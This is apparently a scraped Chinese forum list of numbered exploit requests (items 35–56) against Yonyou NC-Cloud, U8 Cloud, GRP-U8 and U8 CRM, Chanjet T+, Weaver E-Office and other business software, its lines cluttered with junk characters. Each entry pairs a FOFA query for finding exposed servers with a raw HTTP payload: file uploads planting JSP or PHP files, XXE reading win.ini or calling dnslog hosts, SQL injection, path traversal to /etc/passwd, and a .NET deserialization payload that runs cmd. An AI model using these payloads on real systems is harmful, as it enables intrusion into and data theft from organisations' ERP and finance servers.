& k# T9 M$ i; Z9 rFOFA:app="用友-NC-Cloud", u9 d1 g( u3 }& U |
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1* ^1 k/ [# K6 s' Y0 ?
Host: 203.25.218.166:8888
- |# A2 e# y7 e* lUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
8 X* c/ }; L2 f Q: e. YAccept-Encoding: gzip, deflate
2 V0 l }3 ?1 G ]- e, XAccept: */*
$ @% }1 Z" g P# |& v& kConnection: close
2 u+ t' c) ?+ D2 T$ Q0 A4 naccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA" v; g3 P* m5 d( i$ [# w
Content-Length: 190
9 ~! x! g* `: L6 g, R. \% D* @2 UContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
$ B6 z7 O, i! d; g3 T1 \. o' _# H x7 P+ B* a' H
--fd28cb44e829ed1c197ec3bc71748df0
" I6 A3 _1 `/ a6 {# Q1 c* M8 N# rContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"! o) J( F, }7 H- v5 [; q
: | `: _& E' j, y Q: X<%out.println(1111*1111);%>
! m. x3 j* d8 U, u- I: a--fd28cb44e829ed1c197ec3bc71748df0--
: k& W$ s4 V3 C
1 R) z8 f& F1 l* [' a# W# k [6 ~. ~/ Y! |$ |4 N+ x3 O
36. 用友NC-Cloud soapFormat XXE6 I4 q" p# a3 j& s/ H
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/". U2 [( y, D+ Y& i0 i0 @
POST /uapws/soapFormat.ajax HTTP/1.1& V& n* u. Y" `- q& Y8 e) [
Host: 192.168.40.130:8989
x# i+ ]& m" sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.06 f& I0 Z' g& M' A- o0 W3 R F
Content-Length: 2630 T" _* K% ~& I. R" ?' ?+ E, ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: ]+ b( Q% `% d; @- j; A- f+ ^% DAccept-Encoding: gzip, deflate
: Y- N9 l' N4 H" x5 r# N: a4 @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# P L' M+ n" @Connection: close
5 y7 I: U, n* ]- Z7 l# n5 d" [4 cContent-Type: application/x-www-form-urlencoded
. u) P+ n& Y! M- @% L* z8 n8 f& \Upgrade-Insecure-Requests: 1
7 J2 z2 S/ d: R/ m9 G1 Y9 Q/ B
# R+ k; f! n+ Bmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a" O. [" Y7 [) C) A! E; O& l% w7 G
0 N' j9 w$ Y% W6 D$ F0 Q) D0 s B `; s
37. 用友NC-Cloud IUpdateService XXE
9 [! T2 T1 U' g: U* a1 dFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
/ y" P* z+ K2 U3 F* n" o# }POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
; Y. t. N) A; I' _4 B, XHost: 192.168.40.130:8989* V+ ~8 i- C) q7 C N% o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36/ j( x. K3 ]5 m+ e
Content-Length: 421 e1 K/ t) G) H- J% D# C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
) d% g8 f/ l3 e; k5 O8 W; [. \Accept-Encoding: gzip, deflate
0 @, X& J4 s1 T( ^8 n) lAccept-Language: zh-CN,zh;q=0.9
4 L' e/ T. _2 b2 \Connection: close+ G p) k- I5 a+ p& a
Content-Type: text/xml;charset=UTF-8: W' m/ @; t7 m
SOAPAction: urn:getResult d, P- h4 Y# v+ z; r( s
Upgrade-Insecure-Requests: 1
) \, P$ S a: R% D" M! O$ Y+ b- A% r4 M+ k9 e9 z8 f
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
; a; T: h8 w0 d) l5 Q: r* d, A<soapenv:Header/>
/ x1 Q7 S4 ^2 I3 J2 B1 [$ g/ G<soapenv:Body>
1 y3 m5 I6 g1 g6 W# ^. u1 w<iup:getResult># |3 q9 I( A) t' l9 e
<!--type: string-->
) O6 P# F& x; P$ `# y<iup:string><![CDATA[5 S, k1 U4 {+ s T
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
7 K% Q8 ]. w/ ]1 d9 Z, h<xxx/>]]></iup:string>7 }; p) ^! U5 l2 a0 B
</iup:getResult>' t3 z& z( J* A, d& d
</soapenv:Body>! h/ S+ e: X% C9 S/ b; x% Z
</soapenv:Envelope>! Q) w& h4 t; \* I' W" W
8 I# ~7 @# W( Q4 z* d
+ A7 y, y4 }) K% d/ T- @- `3 D# B% M5 Z% t
38. 用友U8 Cloud smartweb2.RPC.d XXE
$ M0 C R1 H6 v" r8 _) PFOFA:app="用友-U8-Cloud"
p( G- {) ]* O) t; g5 `& c1 OPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1# L6 g% m8 V! }4 `9 A
Host: 192.168.40.131:8088+ G x) Z8 F+ q: N& e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
9 e- e( ^, x+ C( }Content-Length: 260: l0 V, p( \6 I6 g% c3 U+ U0 V* R6 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3, X1 [0 m( d* w- A
Accept-Encoding: gzip, deflate, ~' k1 d. k* \7 _9 E
Accept-Language: zh-CN,zh;q=0.9
0 E: ?. A- Z6 VConnection: close7 k& ?) Y |: |* a
Content-Type: application/x-www-form-urlencoded
8 ~; z% x" R* N3 q& Y) E2 M7 e% W( I" T9 ?! |5 i& I
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
! v) }1 O ]5 A1 V5 |6 r7 x+ Y
' z) U; G8 j/ D$ }7 I6 E9 T* P. Y6 N7 c% E
39. 用友U8 Cloud RegisterServlet SQL注入
# z6 r3 ]1 h6 A+ y* k: F1 HFOFA:title="u8c"
, Y: |* u5 `' i; KPOST /servlet/RegisterServlet HTTP/1.1
5 w- m/ D+ w5 }) f/ YHost: 192.168.86.128:80891 \7 T: b O9 Z( c5 Q, B% S9 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36$ f) j) b; W y6 g8 x# ]
Connection: close" O! J) B1 T2 s7 W
Content-Length: 85
- p) L$ Z/ R0 n; f7 s9 BAccept: */*8 S: i" h, J+ P" A. f
Accept-Language: en/ X7 _' B0 M0 _7 ]* a' E
Content-Type: application/x-www-form-urlencoded
/ q& d) j# n# F# a% iX-Forwarded-For: 127.0.0.1- A: n f/ K' ~1 ?
Accept-Encoding: gzip
9 f+ U# F0 _% {5 |* v- h9 g0 B
v5 X9 ~: n( I0 j M. m/ I3 [usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0-- d2 g; [! i7 `. t0 v+ x) O- X
$ T' ` R: u) ~+ R# z: O9 j* P7 }
! i* z; i4 G( U' |/ G/ M, A40. 用友U8-Cloud XChangeServlet XXE6 Y" j3 U/ v5 S
FOFA:app="用友-U8-Cloud"
% G( Y7 v% ^# s9 z% j) z5 x) ?POST /service/XChangeServlet HTTP/1.1
% E, g, r" T$ t+ {& P1 [4 WHost: x.x.x.x, F$ E1 {, q6 R& ]% {7 j4 [6 V' |
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
5 l! F" a" `$ ~( f5 A7 Y, {9 g: dContent-Type: text/xml
) _& j$ B- x0 YConnection: close
; k8 K4 ~; \/ W R5 n6 x% V8 d. f' D) d7 Y- a5 `9 I! _* @9 W9 r
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>; l! ^9 [+ o& V0 |
% ?" ~$ L, h" i% M- ]- J
: x$ |& @1 C+ I; j41. 用友U8 Cloud MeasureQueryByToolAction SQL注入6 i7 m! J0 d5 ]/ ~
FOFA:app="用友-U8-Cloud"$ V2 `9 B' f9 C' _+ @
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
+ q4 W% h& M j( T& d$ \Host:) g% W* d j7 e: K+ P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; }% E, L" n5 U$ i- A$ \Content-Type: application/json2 Y. B( ?1 A$ o3 Z
Accept-Encoding: gzip
* {# i6 m7 ?, H8 t! xConnection: close
' y% ?0 B. J8 X% a" U+ @. r. k$ \( ^3 i4 @1 W5 T
# R! H# }5 j3 p- [ g. W2 q
42. 用友GRP-U8 SmartUpload01 文件上传2 u7 p) C% i$ R. w8 e0 r
FOFA:app="用友-GRP-U8"
2 J) u- e$ o7 @+ [5 oPOST /u8qx/SmartUpload01.jsp HTTP/1.1% K& q; }7 D0 a# j
Host: x.x.x.x8 X" D. J/ c9 x/ Q) g/ V; n
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt. |' d( o/ G3 C5 ^ a9 N7 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
8 P& X( W( }4 z3 N- \9 I: L. W1 E; K/ K" L4 _* v7 h! p5 z, ]7 [
PAYLOAD
) q6 I) N6 r' ^
: l; v1 f9 x0 E. x8 K4 r3 w% c& x* @2 y, i9 x9 V3 O
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
+ P1 [- k; y9 V, c+ c3 G- G3 h4 s$ }: ]
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
% {8 ]- Q9 P- g pFOFA:app="用友-GRP-U8"
; @' a# L& E; ~8 D2 pPOST /services/userInfoWeb HTTP/1.1
7 j# s3 h" o/ qHost: your-ip* ~+ L6 O. t+ B4 W F4 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
. {4 X1 v& z1 [# @6 Z `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. j i" } S* B/ I8 zAccept-Encoding: gzip, deflate1 Q& t% S4 a, [7 Z/ U
Accept-Language: zh-CN,zh;q=0.9, y' s( M) }7 g4 X7 _
Connection: close
& q, t6 G0 b' FSOAPAction:
' X! l: `; X( c" s2 MContent-Type: text/xml;charset=UTF-8
1 g! ^! i: X6 ?9 U0 @3 b M5 y1 H# S9 G% Z6 E% {
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
. c) i7 h6 L- g/ ~ <soapenv:Header/>
1 n0 e7 b/ E# m. i$ i+ u <soapenv:Body>: b+ L6 u9 c5 ] a3 z! e6 J% B
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">. H7 g( S$ d; Q# E2 v! X
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
. ]7 m! t4 }& G* I; w' N! Q8 h( v </ser:getUserNameById>
, T4 l9 N# U# R# a$ C </soapenv:Body>
1 i Y* K* Y( Q7 J, ^% F</soapenv:Envelope>
# e9 y( i8 [# b# s$ T+ E: y/ u# r; ~3 A( V! T( u9 S
2 D$ s( B e" ~6 T$ M* d# `44. 用友GRP-U8 bx_dj_check.jsp SQL注入
; \- Z8 L3 l4 J9 x! X, W8 g+ a% b5 YFOFA:app="用友-GRP-U8"9 v. V+ u k, V# M
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
. H/ w& f9 H! j7 c6 R n" mHost: your-ip. _3 ^4 ~4 ~. H$ E% a+ N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
! ?! u; P$ g/ {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, @* W+ J8 c9 W+ ]Accept-Encoding: gzip, deflate
1 Z! H! ^+ g- u G# wAccept-Language: zh-CN,zh;q=0.90 C) b( |; s: R8 G; C# F$ f
Connection: close) X# K' {4 Q$ _8 T6 l" O* M) R
2 B( S y' r2 Y. M% Y4 q
. n$ y, D7 r: Q0 i45. 用友GRP-U8 ufgovbank XXE
- i% P; Q1 x% c0 j/ p P8 ]1 I' b* dFOFA:app="用友-GRP-U8"6 y9 ^7 M ^8 q
POST /ufgovbank HTTP/1.1
5 y# d) a( s) g& \8 AHost: 192.168.40.130:222" q& E0 K4 |4 |% h5 J6 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
' k5 Y' e+ ^! ? `& r2 u. Z- {Connection: close$ q" t( i, z$ t+ r- d" s
Content-Length: 161
# O$ Q/ ?. l. }4 @( W/ SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( T7 A3 R2 n4 r; a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 a+ w1 x3 s; c6 q- s- YContent-Type: application/x-www-form-urlencoded. s3 q8 a( I2 `
Accept-Encoding: gzip
# j: F6 b+ _ o
% O; d* c7 u' ]+ a5 A/ S1 N% Z7 ]reqData=<?xml version="1.0"?>
4 c$ y0 U) {! c<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
D' @8 M I( V }/ k
+ R% [; P, u' R& @) v3 l4 F
( \+ p, G& C: [/ z/ u46. 用友GRP-U8 sqcxIndex.jsp SQL注入' ]$ H z9 @% F7 F7 B0 M" B
FOFA:app="用友-GRP-U8"
: B& S6 N# G! y' C1 @( T- C( cGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1" Q/ x! A8 Y6 H) h
Host: your-ip1 k7 \; z3 A4 O+ Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
* X8 z6 C+ ]0 c* @( h0 _; F! WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 z3 `, f0 O" b# u, PAccept-Encoding: gzip, deflate8 U+ r: `" j3 l/ `
Accept-Language: zh-CN,zh;q=0.9
4 D. ?8 k: O3 F3 eConnection: close$ v! O# k( ?5 F0 T% I5 V0 ^2 _1 w: Z
' ~# K( n. a3 l2 c( l
# c4 J4 V' {+ k, i/ o. w3 ~
47. 用友GRP A++Cloud 政府财务云 任意文件读取
0 b4 I( E9 _9 }5 s1 C XFOFA:body="/pf/portal/login/css/fonts/style.css"' @1 u& V0 S! z8 k; [' {- P
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
8 T6 U% L. V0 JHost: x.x.x.x" `# d; r/ E: A# s: p
Cache-Control: max-age=0
6 b- ~. j+ [& [$ f# t. j! ~% UUpgrade-Insecure-Requests: 1
% L7 r$ C1 x& e; |' N( @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 d" }' h' `/ f! C4 Q$ ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, J) w% ]. N) z# R8 @
Accept-Encoding: gzip, deflate, br
, a N) ^( m% q' rAccept-Language: zh-CN,zh;q=0.9
& \/ d5 \/ t0 C: K7 u1 C4 e7 b. LIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
+ k- Y; [4 b9 ^5 P8 jConnection: close6 O. g5 x6 d$ E+ g' D' H" r4 H
9 R9 ?# C0 q& L D
" a- ?6 o% V/ t% ?
9 v- z- R& d( [( g2 t% T48. 用友U8 CRM swfupload 任意文件上传/ Y" j. I7 V. M R7 @
FOFA:title="用友U8CRM"5 H9 W9 v9 H" r; \
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
3 s; G5 U! { ZHost: your-ip! K: y f8 M/ U& f! W7 o; Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.00 C" Q1 n' ~2 _, Z7 F+ N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- u# Z: @& A ^- Q% Y `1 x' s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 @" D; t$ O8 a: N& vAccept-Encoding: gzip, deflate8 E- { o7 r5 |4 B! G6 y1 ?
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855+ N2 i. w, a% O, R* l* ?9 S
------269520967239406871642430066855 a; m4 y7 W" J3 B
Content-Disposition: form-data; name="file"; filename="s.php"
' {9 q+ n* V9 @6 I' Q7 w7 L1231
& X) |/ G3 P* P2 ]# g; Y) c- d$ aContent-Type: application/octet-stream" U, U9 n6 v: g* ^0 ]/ @
------269520967239406871642430066855" B2 r/ h1 `% u/ A
Content-Disposition: form-data; name="upload" \3 P* Q) R: b. c
upload
( o; M1 o5 Z& k+ j5 H------269520967239406871642430066855--
4 ^8 v6 Q2 [& Q" m! b( V' V9 \
* u& a- v% \/ b! _9 x# Y0 b2 A; U& m7 I1 ?: P: b' P z+ w
49. 用友U8 CRM系统uploadfile.php接口任意文件上传8 B1 X$ ]# D P7 t- u+ |, b
FOFA:body="用友U8CRM"
2 }, e8 H! M5 h, T* ?) ~8 A6 h, j6 B- I8 A6 T% U
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
N! D. y- |* K- B% ]8 tHost: x.x.x.x
. B9 i, }; j6 i1 h5 C' PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& |: `/ k: b6 R9 y% C. C' G
Content-Length: 329
# [0 D4 f! ], Z+ Y1 A J1 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& U) U% v! v6 k4 R8 G. |
Accept-Encoding: gzip, deflate6 n# Y0 |/ |% S4 L+ _- j) ?% F7 |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% A+ {' h( ?' \2 f9 G
Connection: close
0 N: D2 V) }: ]. FContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w, S9 D% r8 O! Z. E1 C! W1 U) P, u1 m
' Z4 t+ w2 q; U/ K4 e- n# j
-----------------------------vvv3wdayqv3yppdxvn3w
; w& Y: O& T O. Z4 p* U0 n: S' E* rContent-Disposition: form-data; name="file"; filename="%s.php "* _8 }5 X3 g. O* h, i* Y2 x, H8 F
Content-Type: application/octet-stream
# j) m% U% @. p- t% [5 U
! ~: Q& R3 S8 z* y5 N5 pwersqqmlumloqa8 ^8 e A1 @5 p- ?' p
-----------------------------vvv3wdayqv3yppdxvn3w
6 z( E; s- X( OContent-Disposition: form-data; name="upload"8 a( `4 K9 D S q- u
) g1 q4 Z$ z1 x. Z& qupload
- z2 I+ L# h( c: B V-----------------------------vvv3wdayqv3yppdxvn3w--: q9 U2 A2 o( W7 q' U3 {; S/ e" R1 L
+ ]/ J. D* h% D' C6 m# _
) A& x! q2 [! a4 Z- j% o: k) Thttp://x.x.x.x/tmpfile/updB3CB.tmp.php8 b, |* c4 h! i
: c* F& o& Q- W; M+ g/ l50. QDocs Smart School 6.4.1 filterRecords SQL注入
4 a: X, p8 A4 Y) ^FOFA:body="close closebtnmodal"
, y$ r) l' `+ S& R% Z1 M# sPOST /course/filterRecords/ HTTP/1.1
/ Q$ `# |! U8 T$ x0 O- z! fHost: x.x.x.x
: w, N! J, j( s4 G6 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
: T0 E3 ^! X4 h5 u$ }$ [Connection: close
2 U; H3 h, x# U2 Y: a, C3 AContent-Length: 224
- F( Y0 t; q( O# X: M( VAccept: */*! c$ V* t4 i `% \$ w
Accept-Language: en
: y; m/ v- [; YContent-Type: application/x-www-form-urlencoded; d3 q& |; S5 n
Accept-Encoding: gzip
) r4 D% a. K5 @$ s
5 ^2 B; R& b; O- k8 x9 Isearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
, M3 y5 P2 K0 w1 Q0 o, I
& S' i' w+ K+ Z2 s$ R K i& B3 m/ n) ^$ f
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入* p6 }2 A. a) ?" j2 t& {4 D
FOFA:app="云时空社会化商业ERP系统"
( p2 L0 D" B8 v: X" F$ XGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
+ A9 i+ y! {7 Z) S3 m, [Host: your-ip: t2 W6 y7 f2 R, r
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36* v/ S3 b" L, [* ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.92 H8 j H- O- v, J! T, w4 p y
Accept-Encoding: gzip, deflate
5 f; O& l- A# U6 [Accept-Language: zh-CN,zh;q=0.9! H. c8 m* A9 h) b- Z; U9 v
Connection: close
2 a1 z5 F+ E: q8 p$ z1 q2 E0 |& |5 M, c3 h* a
3 d' q" Z% |- ?, N3 ? K
52. 泛微E-Office json_common.php sql注入
" t7 G" b* U5 c" a" `( IFOFA:app="泛微-EOffice"% a& ` D9 A9 T; i& r
POST /building/json_common.php HTTP/1.1
, r& Y+ f1 u- h- ^. a0 }& UHost: 192.168.86.128:8097
0 H5 {/ k. @% p7 |8 {User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ ` f" z8 x, GConnection: close
0 R4 z& ` p& m2 V. A: \Content-Length: 87
& F! ^$ L5 H. g. a9 v2 w3 R i1 Q1 nAccept: */*
+ k, R6 B2 e5 \& t% qAccept-Language: en, A- [6 B4 r5 f% E, {
Content-Type: application/x-www-form-urlencoded% k# s) ], G9 _1 ?: q
Accept-Encoding: gzip1 Q9 O3 h, A) B0 t" M/ J
# V8 Z5 D& L; X& M9 ctfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
; J5 ?7 u8 Q: ?" ]$ |+ E7 k+ ^' \5 J. A w6 R9 o9 Q
! t A1 I( a/ U' L4 A
53. 迪普 DPTech VPN Service 任意文件上传
" Y! y* k& h: S% O) U- F l/ ?FOFA:app="DPtech-SSLVPN", Q: B* ?; m4 `- }% v* A
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
* ]: S; d8 a1 c2 H- [3 h* v
5 @# t1 E* D0 y. a$ l/ L4 n+ }$ G
, s- D$ ^0 H5 N54. 畅捷通T+ getstorewarehousebystore 远程代码执行
% c3 M+ b$ ~9 q3 K) [% nFOFA:app="畅捷通-TPlus"- @/ _) s) [0 E" v0 Q
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
9 }, S" c" f* g7 J4 ^4 A4 z2 N"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"2 N6 \' z2 i% D0 k* h+ t
7 U- Y! R/ D$ A. _9 D' E* m+ ?
: C) f5 z. S& ^( Y. p$ I
完整数据包) O6 J: V% B0 V5 ~& F+ m8 h; l
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
5 M1 f! @) S5 k- N" gHost: x.x.x.x
2 P* @3 a5 q# A3 u1 }2 ] |) q/ `User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F7 ^& k& z2 }3 C( t3 q
Content-Length: 593
4 ?0 P' o r u- [
( I" e w" p" q- P5 k3 O{
4 W- z/ u! q, W1 W"storeID":{
; k- {: h8 S9 j! @: z3 {, _* x "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
# w7 B$ ?" T7 E5 I( o "MethodName":"Start",4 |. W' I$ J/ I5 Z1 m3 ^8 U; B1 }
"ObjectInstance":{) w0 ?" n! e% U3 {
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",+ j* V; O3 n/ G: v% Y
"StartInfo":{: l& h5 ?2 @ F! m' T
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% h2 a8 U: W$ O
"FileName":"cmd",' c$ X2 J' L) j) S6 ?* V
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
- @& h! L3 R5 w* Z }
- q$ O4 t- I9 z7 Z% | }; T) I b( t; q+ J, ?
}
6 K- o# A6 O+ S+ K3 Y% R}: a6 o- j q2 ^# E# w8 f$ u! j5 k
7 ^3 ~6 u4 n, j( B5 f9 s9 R5 ?; Q
$ L- P; B( I# G, J4 i
第二步,访问如下url& @' `7 C* G, p6 X
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
! r' t; n( e" a+ r; J7 g: t: d, V. L$ l9 N2 _
# @4 }0 k! p1 H( h% I6 W55. 畅捷通T+ getdecallusers信息泄露
& n5 T6 B( ^, F* O, N' OFOFA:app="畅捷通-TPlus"/ N& Y, k, l: t- O4 C; x6 M# W: o h
第一步,通过
( e# i$ q0 O6 c$ F; X3 w/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
8 S D1 {8 r: [; q第二步,利用获取到的Cookie请求- c6 W& ^: A2 W) m* t* H" P I" }
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
& S/ B; b- y* A$ S3 K; \2 g0 A/ D; a
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
# p, |) ]! b$ S* N( {9 AFOFA: app="畅捷通-TPlus"9 [/ F" p4 t' O
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1# _2 @5 _: Z5 d" n
Host: x.x.x.x, l$ f# C7 M# `* D [) K; d. V
